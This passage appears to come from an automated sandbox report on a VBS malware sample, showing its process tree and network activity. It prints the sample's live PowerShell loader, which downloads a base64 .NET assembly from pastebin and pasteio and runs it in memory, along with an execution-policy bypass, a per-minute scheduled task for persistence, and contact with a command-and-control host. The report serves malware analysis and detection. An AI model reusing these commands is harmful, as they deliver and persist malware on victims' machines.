yHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5024
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
                5⤵
                • Blocklisted process makes network request
                • Drops startup file
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2304
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                    7⤵
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1136
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4272
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
                  6⤵
                    PID:1068
                    • C:\Windows\system32\schtasks.exe
                      schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
                      7⤵
                      • Creates scheduled task(s)
                      PID:5076
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5048
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    6⤵
                      PID:1532
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      6⤵
                        PID:840

Network

  • US
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    pastebin.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    172.67.34.170
    pastebin.com
    IN A
    104.20.67.143
    pastebin.com
    IN A
    104.20.68.143
  • US
    GET
    https://pastebin.com/raw/16APD4C6
    powershell.exe
    Remote address:
    172.67.34.170:443
    Request
    GET /raw/16APD4C6 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 01 Jul 2023 01:07:41 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Sat, 01 Jul 2023 01:07:41 GMT
    Server: cloudflare
    CF-RAY: 7dfac0e85eed0b78-AMS
  • US
    GET
    https://pastebin.com/raw/Z5e79zhW
    powershell.exe
    Remote address:
    172.67.34.170:443
    Request
    GET /raw/Z5e79zhW HTTP/1.1
    Host: pastebin.com
    Response
    HTTP/1.1 200 OK
    Date: Sat, 01 Jul 2023 01:07:42 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Sat, 01 Jul 2023 01:07:42 GMT
    Server: cloudflare
    CF-RAY: 7dfac0eeb8020b78-AMS
  • US
    DNS
    pasteio.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    pasteio.com
    IN A
    Response
    pasteio.com
    IN A
    188.114.96.0
    pasteio.com
    IN A
    188.114.97.0
  • US
    GET
    https://pasteio.com/download/xpQ3RFXbtxKz
    powershell.exe
    Remote address:
    188.114.96.0:443
    Request
    GET /download/xpQ3RFXbtxKz HTTP/1.1
    Host: pasteio.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 01 Jul 2023 01:07:42 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: ci_session=86be457e832146f09100ab629e70de334b1a4a18; expires=Sat, 01-Jul-2023 03:07:42 GMT; Max-Age=7200; path=/; HttpOnly
    Expires: 0
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Disposition: attachment; filename=dsadsa.txt
    Vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FgUOx%2BzRQNCpKm5gMuwC%2BURAB%2B6CiVr2NyAJ%2Bb2%2BFHHgmBQbW%2BCgNB0duBFC6hcptWqMdXtj197fEAkx7Ca96eisEayMDh47COUAmM2u19ldH4Mvv3472QHogU4ydQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7dfac0eb6da3422a-AMS
    alt-svc: h3=":443"; ma=86400
  • US
    GET
    https://pasteio.com/download/xqb6ywinf7il
    powershell.exe
    Remote address:
    188.114.96.0:443
    Request
    GET /download/xqb6ywinf7il HTTP/1.1
    Host: pasteio.com
    Response
    HTTP/1.1 200 OK
    Date: Sat, 01 Jul 2023 01:07:43 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: ci_session=03af4eb9c1ad185801004a7d4af982e53ab36668; expires=Sat, 01-Jul-2023 03:07:43 GMT; Max-Age=7200; path=/; HttpOnly
    Expires: 0
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Disposition: attachment; filename=Untitled.txt
    Vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sFQVC3ZUBL3Tncjok9v1gUhQBkPPYiupUahZuSeofezFaUMAr2y6%2FM78KT0a5026Z%2FVgqo6jS9ayJTEW%2FMjrLqJ8WuX2fn7UF3CS5bEnuPDshZ8%2B6dlU%2BM6tLQ8rhg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7dfac0f1ae77422a-AMS
    alt-svc: h3=":443"; ma=86400
  • US
    DNS
    170.34.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    170.34.67.172.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    wtools.io
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    wtools.io
    IN A
    Response
    wtools.io
    IN A
    104.21.6.247
    wtools.io
    IN A
    172.67.135.130
  • US
    GET
    https://wtools.io/code/dl/bMLn
    powershell.exe
    Remote address:
    104.21.6.247:443
    Request
    GET /code/dl/bMLn HTTP/1.1
    Host: wtools.io
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 01 Jul 2023 01:07:42 GMT
    Content-Type: text/plain; charset=utf-8;
    Transfer-Encoding: chunked
    Connection: keep-alive
    content-disposition: attachment; filename=d.txt
    x-xss-protection: 1; mode=block
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uIOPUbqxk5698pGyRXmWvRYjuHk65WIHAYX3HULQc8t9TUks%2F7tnc9EA2UdHTCwsLmqlce7zshGJFJsFqtu9sL8lKCCR0f7Qw5Q2X16GtLsBqrfICEAq5V8364I%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7dfac0f14fc606d2-AMS
    alt-svc: h3=":443"; ma=86400
  • US
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              134.32.126.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              134.32.126.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              0.96.114.188.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              0.96.114.188.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              55.36.223.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              55.36.223.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              247.6.21.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              247.6.21.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              ip-api.com
              aspnet_compiler.exe
              Remote address:
              8.8.8.8:53
              Request
              ip-api.com
              IN A
              Response
              ip-api.com
              IN A
              208.95.112.1
            • flag-us
              GET
              http://ip-api.com/json/
              aspnet_compiler.exe
              Remote address:
              208.95.112.1:80
              Request
              GET /json/ HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
              Host: ip-api.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:45 GMT
              Content-Type: application/json; charset=utf-8
              Content-Length: 323
              Access-Control-Allow-Origin: *
              X-Ttl: 22
              X-Rl: 42
            • flag-us
              DNS
              crazydns.linkpc.net
              aspnet_compiler.exe
              Remote address:
              8.8.8.8:53
              Request
              crazydns.linkpc.net
              IN A
              Response
              crazydns.linkpc.net
              IN A
              95.214.27.180
            • flag-us
              DNS
              1.112.95.208.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              1.112.95.208.in-addr.arpa
              IN PTR
              Response
              1.112.95.208.in-addr.arpa
              IN PTR
              ip-api.com
            • flag-us
              DNS
              180.27.214.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              180.27.214.95.in-addr.arpa
              IN PTR
              Response
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:08:03 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: HIT
              Age: 15
              Last-Modified: Sat, 01 Jul 2023 01:07:48 GMT
              Server: cloudflare
              CF-RAY: 7dfac1733f0106da-AMS
            • flag-us
              DNS
              216.74.101.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              216.74.101.95.in-addr.arpa
              IN PTR
              Response
              216.74.101.95.in-addr.arpa
              IN PTR
              a95-101-74-216.deploy.static.akamaitechnologies.com
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:03 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:09:03 GMT
              Server: cloudflare
              CF-RAY: 7dfac2e4ef8fb734-AMS
            • flag-us
              GET
              https://pastebin.com/raw/Z5e79zhW
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/Z5e79zhW HTTP/1.1
              Host: pastebin.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:04 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:09:04 GMT
              Server: cloudflare
              CF-RAY: 7dfac2f08dcdb734-AMS
            • flag-us
              GET
              https://pasteio.com/download/xpQ3RFXbtxKz
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xpQ3RFXbtxKz HTTP/1.1
              Host: pasteio.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:03 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=ab1720ddd537e5dee30497a51dd602e2fe091494; expires=Sat, 01-Jul-2023 03:09:03 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=dsadsa.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L7QBQUy0N%2BCBDaoHi%2FWLnfrgG6mwofQkYItjUCaFBfNWknEDNdUrwCqgPMtrQt4zo7qk7L5m7OXhfset052wUDws84IYBtNucNy9F0LOrIjG3DSJJrUQI5sHYVjU5g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2e7def10bed-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://pasteio.com/download/xqb6ywinf7il
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xqb6ywinf7il HTTP/1.1
              Host: pasteio.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:05 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=34de8e2d61cb2a1e44d9ffa716c82288d593f48e; expires=Sat, 01-Jul-2023 03:09:05 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=Untitled.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgfYpQxuvbWznz0Bh2VIng8qE9Gqj6Y47q8osrfHFe33kCQIsqoRVF1TdCyWRvjivX5cjTtmiZJF2G77Ppvovk6DCKVGdd9tNR2FKUNBf5LdUNzk6lxAkl9y5hLXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2f339280bed-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://wtools.io/code/dl/bMLn
              powershell.exe
              Remote address:
              104.21.6.247:443
              Request
              GET /code/dl/bMLn HTTP/1.1
              Host: wtools.io
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:05 GMT
              Content-Type: text/plain; charset=utf-8;
              Transfer-Encoding: chunked
              Connection: keep-alive
              content-disposition: attachment; filename=d.txt
              x-xss-protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nYGv0t7CfmIn2aNPlpFsXXwbnOo637EC3%2FXUJDukD7fssfElHQCpKXzz89dwlM3%2FO63Waf4SvcwMV3fufd5wDqLl3pDrXl2tNNYyjz0MiFt2XxA%2FRrERMnhe7ck%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2f2c9780a7b-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              DNS
              45.8.109.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              45.8.109.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:04 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: EXPIRED
              Last-Modified: Fri, 30 Jun 2023 15:47:18 GMT
              Server: cloudflare
              CF-RAY: 7dfac463caf30bba-AMS
            • flag-us
              GET
              https://pastebin.com/raw/Z5e79zhW
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/Z5e79zhW HTTP/1.1
              Host: pastebin.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: EXPIRED
              Last-Modified: Fri, 30 Jun 2023 08:50:04 GMT
              Server: cloudflare
              CF-RAY: 7dfac46f5cde0bba-AMS
            • flag-us
              GET
              https://pasteio.com/download/xpQ3RFXbtxKz
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xpQ3RFXbtxKz HTTP/1.1
              Host: pasteio.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:04 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=1fb9b7aadc646e7b7e92b6dd71fd47ba8cb41d4b; expires=Sat, 01-Jul-2023 03:10:04 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=dsadsa.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3yHajzLbSmKTUBU%2Fo1VncXwAxQpXD0dDv08Pc%2FO%2BegamjUoptZsttFZPUQgmpyEXio2N8cogFdEN%2B90t%2F54qS8rYJliJdm2iewe5Q8HkHZftJoNyvbjxV3%2BF9jhSJw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac4662da206c0-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://pasteio.com/download/xqb6ywinf7il
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xqb6ywinf7il HTTP/1.1
              Host: pasteio.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=ea9b83495acf6af0541a3c889681b86888ac1e0b; expires=Sat, 01-Jul-2023 03:10:06 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=Untitled.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBFddz%2FZuU64DA6G1dFD8zOzpajmks5GWyRTcPZG%2FkbaKhVqQS6RYK%2FIFDKjRHKPNdHR%2FEJwg9AB1VIKpZ%2Fq8AGWKwLNLO0eYR5qUyyV36W1eGbNitWcF2gWV59zRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac471cfd106c0-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://wtools.io/code/dl/bMLn
              powershell.exe
              Remote address:
              104.21.6.247:443
              Request
              GET /code/dl/bMLn HTTP/1.1
              Host: wtools.io
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/plain; charset=utf-8;
              Transfer-Encoding: chunked
              Connection: keep-alive
              content-disposition: attachment; filename=d.txt
              x-xss-protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cQ0BVumU76B96C9yNWxoIbzuKj6znnGCk1%2Bu8PkJpKxlouD9WKp%2B6vFtJX%2FtTHzagJoXNiRgCfj4VI1wpn2kjPbXPDTuXpZ%2B%2BUwKrEQGCM7%2FGZ9yAtKrFsnz9yw%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac4712d6a1e6d-AMS
              alt-svc: h3=":443"; ma=86400
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              891 B
              4.2kB
              10
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.7kB
              518.2kB
              202
              392

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
              65.6kB
              31
              53

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 208.95.112.1:80
              http://ip-api.com/json/
              http
              aspnet_compiler.exe
              374 B
              672 B
              5
              4

              HTTP Request

              GET http://ip-api.com/json/

              HTTP Response

              200
            • 95.214.27.180:26133
              crazydns.linkpc.net
              aspnet_compiler.exe
              1.6kB
              881 B
              17
              15
            • 172.67.34.170:443
              https://pastebin.com/raw/16APD4C6
              tls, http
              powershell.exe
              726 B
              3.6kB
              8
              7

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200
            • 188.114.96.0:443
              pasteio.com
              powershell.exe
              260 B
              5
            • 20.42.65.88:443
              322 B
              7
            • 188.114.97.0:443
              pasteio.com
              powershell.exe
              260 B
              5
            • 209.197.3.8:80
              322 B
              7
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              891 B
              4.2kB
              10
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.8kB
              518.2kB
              204
              392

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
              65.7kB
              32
              54

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              937 B
              4.2kB
              11
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.5kB
              517.8kB
              197
              382

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
              65.7kB
              31
              54

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 8.8.8.8:53
              208.194.73.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              208.194.73.20.in-addr.arpa

            • 8.8.8.8:53
              pastebin.com
              dns
              powershell.exe
              58 B
              106 B
              1
              1

              DNS Request

              pastebin.com

              DNS Response

              172.67.34.170
              104.20.67.143
              104.20.68.143

            • 8.8.8.8:53
              pasteio.com
              dns
              powershell.exe
              57 B
              89 B
              1
              1

              DNS Request

              pasteio.com

              DNS Response

              188.114.96.0
              188.114.97.0

            • 8.8.8.8:53
              170.34.67.172.in-addr.arpa
              dns
              72 B
              134 B
              1
              1

              DNS Request

              170.34.67.172.in-addr.arpa

            • 8.8.8.8:53
              wtools.io
              dns
              powershell.exe
              55 B
              87 B
              1
              1

              DNS Request

              wtools.io

              DNS Response

              104.21.6.247
              172.67.135.130

            • 8.8.8.8:53
              95.221.229.192.in-addr.arpa
              dns
              73 B
              144 B
              1
              1

              DNS Request

              95.221.229.192.in-addr.arpa

            • 8.8.8.8:53
              134.32.126.40.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              134.32.126.40.in-addr.arpa

            • 8.8.8.8:53
              0.96.114.188.in-addr.arpa
              dns
              71 B
              133 B
              1
              1

              DNS Request

              0.96.114.188.in-addr.arpa

            • 8.8.8.8:53
              55.36.223.20.in-addr.arpa
              dns
              71 B
              157 B
              1
              1

              DNS Request

              55.36.223.20.in-addr.arpa

            • 8.8.8.8:53
              247.6.21.104.in-addr.arpa
              dns
              71 B
              133 B
              1
              1

              DNS Request

              247.6.21.104.in-addr.arpa

            • 8.8.8.8:53
              ip-api.com
              dns
              aspnet_compiler.exe
              56 B
              72 B
              1
              1

              DNS Request

              ip-api.com

              DNS Response

              208.95.112.1

            • 8.8.8.8:53
              crazydns.linkpc.net
              dns
              aspnet_compiler.exe
              65 B
              81 B
              1
              1

              DNS Request

              crazydns.linkpc.net

              DNS Response

              95.214.27.180

            • 8.8.8.8:53
              1.112.95.208.in-addr.arpa
              dns
              71 B
              95 B
              1
              1

              DNS Request

              1.112.95.208.in-addr.arpa

            • 8.8.8.8:53
              180.27.214.95.in-addr.arpa
              dns
              72 B
              147 B
              1
              1

              DNS Request

              180.27.214.95.in-addr.arpa

            • 8.8.8.8:53
              216.74.101.95.in-addr.arpa
              dns
              72 B
              137 B
              1
              1

              DNS Request

              216.74.101.95.in-addr.arpa

            • 8.8.8.8:53
              45.8.109.52.in-addr.arpa
              dns
              70 B
              144 B
              1
              1

              DNS Request

              45.8.109.52.in-addr.arpa

            MITRE ATT&CK Enterprise v6

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

